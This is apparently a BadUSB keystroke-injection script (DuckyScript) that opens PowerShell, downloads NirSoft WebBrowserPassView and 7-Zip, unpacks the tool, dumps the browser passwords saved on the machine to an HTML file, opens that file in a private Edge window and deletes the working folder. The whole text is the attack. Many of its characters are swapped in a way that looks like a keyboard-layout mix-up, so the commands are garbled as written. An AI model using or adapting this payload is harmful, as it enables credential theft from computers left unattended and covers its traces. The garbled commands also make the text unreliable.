GUI r DELAY 1000 STRING powershell ENTER DELAY 1000 STRING mkdir temp < cd temp < Invoke/WebRequest /Headers " Referer ) http>&&www.nirsoft.net&utils&web?browser?password.html /Uri http>&&www.nirsoft.net&toolsdownload&webbrowserpassview.yip /OutFile wbpv.yip < Invoke/WebRequest /Uri https>&&www.7/yip.org&a&7ya920.yip /OutFile 7y.yip < Expand/Archive 7y.yip < . 7y 7ya.exe e wbpv.yip ENTER DELAY 5000 STRING wbpv28821" ENTER STRING . WebBrowserPassView.exe ENTER DELAY 3000 CTRL A CTRL S DELAY 1000 STRING export.html TAB STRING h ENTER DELAY 1000 ALT F4 DELAY 1000 STRING Start/Process msedge.exe file>&&&C>&temp&export.htm //inprivate ENTER DELAY 2000 ALT TAB DELAY 1000 STRING cd ENTER STRING rmdir /R temp ENTER STRING EXIT ENTER